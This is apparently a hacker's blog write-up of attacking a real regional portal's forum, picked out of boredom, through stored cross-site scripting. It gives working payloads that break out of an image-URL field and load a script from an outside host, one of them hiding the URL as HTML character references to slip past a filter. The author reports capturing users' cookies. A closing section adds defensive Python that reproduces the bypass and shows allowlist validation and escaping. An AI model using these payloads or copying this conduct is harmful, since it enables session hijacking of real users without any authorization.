Author: black bird
Today I was bored and went online for a stroll. I suddenly remembered that my girlfriend once said that Linglong had opened a large network, and I suddenly wanted to check its security. I searched Baidu for it:
Liuzhou's largest and most popular comprehensive portal network... If it describes itself like this, let us see what it means to be a portal; I decided to learn a lesson.
I have been paying attention to XSS recently, so I decided to check whether an XSS vulnerability exists.
Go to the forum, register a user, and look for where a network image can be inserted:
Try: http://"><script>alert('A')</script.> Result: nothing happens. Continue and find a network picture. OK, posted successfully.
Hey, let's view the elements.
If the img tag and its src attribute are not properly filtered, XSS can easily appear. We try to capture the packet. The "> is missing from the source code. Try again: "><script>alert('A')</script.>
I don't know why the title turns into garbled characters... Try loading JS from an external source:
<p><a href=http://up.2cto.com/2013/0106/20130106112109502.png" target="_blank"><script src="http://www.gxmhw.net/anying/test.js"></script>png" width="10" height="10"></a></p>
Suddenly found...
It's okay. It cannot stop us from moving forward. I think the site may prohibit external links. Let's change the statement: <p><a href="http://www.2cto.com/static/image/ss/logo.png" target="_blank"><script src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#103;&#120;&#109;&#104;&#119;&#46;&#110;&#101;&#116;&#47;&#97;&#110;&#121;&#105;&#110;&#103;&#47;&#116;&#101;&#115;&#116;&#46;&#106;&#115;"></script>png" <script=""></a></p>
If you look carefully, you should be able to see it:
"><script src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#103;&#120;&#109;&#104;&#119;&#46;&#110;&#101;&#116;&#47;&#97;&#110;&#121;&#105;&#110;&#103;&#47;&#116;&#101;&#115;&#116;&#46;&#106;&#115;"></script>png"
We split the statement into segments and then encode the external link as decimal character references. It is successfully inserted into the diary.
Hey, let's see if we have obtained the cookie value:
Obtained successfully
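
For the defending side, the filter gap described above can be reproduced and closed as follows; this is an added example, not code from the original post or from the forum. The literal-link check is an assumption based on the author's guess that external links were prohibited, the hosts and function names are placeholders, and the strict version validates the whole field against an allowlist and escapes it on output.

```python
import html
import re

# Constructed samples: an image-URL field value that closes the src attribute
# and appends a script element, first in plain form, then with "http:" written
# as decimal character references. Hosts are placeholders.
PLAIN = 'http://forum.example/logo.png"><script src="http://x.example/t.js"></script>png'
ENCODED = ('http://forum.example/logo.png"><script src="'
           '&#104;&#116;&#116;&#112;&#58;//x.example/t.js"></script>png')


def naive_filter(value: str) -> bool:
    """Assumed weak check: allow at most one literal external link."""
    return value.lower().count("http://") <= 1


# Allowlist for the whole field: scheme, host, path characters, image suffix.
IMAGE_URL = re.compile(
    r"https?://[A-Za-z0-9.-]+(:\d+)?/[A-Za-z0-9._~/%-]*\.(png|jpe?g|gif)")


def safe_img_tag(value: str):
    """Return an <img> tag for a valid image URL, or None if rejected."""
    if not IMAGE_URL.fullmatch(value):
        return None
    # Escape on output as well, so the value can never leave the attribute.
    return f'<img src="{html.escape(value, quote=True)}" width="10" height="10">'


def escape_only(value: str) -> str:
    """Output encoding alone: markup characters become inert text."""
    return f'<img src="{html.escape(value, quote=True)}">'


if __name__ == "__main__":
    for name, v in (("plain", PLAIN), ("encoded", ENCODED)):
        print(name, "naive:", naive_filter(v), "strict:", safe_img_tag(v))
    # The browser decodes character references in attribute values, so both
    # samples are the same markup once parsed.
    print("decoded form equal:", html.unescape(ENCODED) == PLAIN)
```

The naive check passes the encoded sample because it inspects the raw string, while the browser acts on the decoded one; the strict version never needs to decode because the quote and angle brackets that end the attribute are outside the allowlist.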